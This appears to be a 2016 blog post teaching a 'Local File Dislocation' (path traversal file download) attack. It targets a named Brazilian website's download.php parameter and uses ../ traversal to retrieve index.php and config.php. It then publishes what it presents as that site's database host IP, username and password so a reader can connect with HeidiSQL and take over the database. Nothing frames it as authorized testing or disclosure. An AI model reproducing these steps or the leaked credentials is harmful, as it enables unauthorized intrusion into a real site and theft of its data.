LFD(Local File Dislocation)

Hack Using LFD, Hack Config Entry, How To Hack Config Data, Website Hacking Using LFD
What Is LFD:-

In Local File Dislocation, Attacker Can Abe To Download Config.php (DataBase) File, And Theft The Db Pass, user Name, Database, Host_name And Connect To The Database Using Some Soft (Hedi Sql), And Than Attacker Login To PhpMyAdmin.



In Local File Dislocation Url Shown The Web Server Directory(that Is vulnerable Section)
Ex:-


www.site.com/download.php?arquivo=/home/mturbina2/public_html/sistema/apresentacao.pdf



Ok Lets Start I Have A Website Try To Download Config File:-



Target:-www.mturbina.com.br/site/download.php?arquivo=/home/mturbina2/public_html/sistema/produtos/kaindl/000000011/pdf/apresentacao.pdf



Step:-1 Copy And Paste The Target Url On The WebBrowser Url Bar, And Hit Enter.

Step:-2 If  We Can Hit The Enter One File Can Be Download, This File Is Useless, We Only Need To Download The Index.php And Config.php



Step:-3 Remove The All Url Section After (download.php?arquivo=) Or Remove The Url After (=/home/mturbina2/public_html/) Follow Any One Condition I Follow First Condition.

Ex:- (Url Now Look Like This) www.mturbina.com.br/site/download.php?arquivo=



Step:-4 Put the (../index.php) After The ?arquivo= Its Use For Directory Jumping Or Send To Back On One Directory on Server. Some Time We Use(../../../../../../../index.php) More Than One Time For Correct Location.


(But In this Site We Not Need To Jumping To Another Location, So We Not Need To Put (,,/))

Ex:- Now Url Like This:- http://www.mturbina.com.br/site/download.php?arquivo=index.php

You Can See The Index.php File Start To Downloading (Download It)



Step:-5 Open The Download File(index.php) Open It In Notepad

Using This (index.php) We Find Out The Config.php(data Base Connection) File Location

We Find out The Successfully Location Of Config File ("../sistema/config.php")



Step:-6 Now Donload The (../sistema/config.php) File.  And Connect To DataBase.

Ex:- http://www.mturbina.com.br/site/download.php?arquivo=../sistema/config.php



Step:-7 Open The HeidiSQL Download Here(http://www.heidisql.com/download.php) And Put Data Base Entry In this.

Config Entry For HediSql:- Located In Config File

Db_Hostname=179.188.16.14
DbUser=mturbina2
DbPass=turbina72


Video Tutorial:-
 
LFD(Local File Dislocation) LFD(Local File Dislocation) Reviewed by Unknown on 2/21/2016 Rating: 5
Powered by Blogger.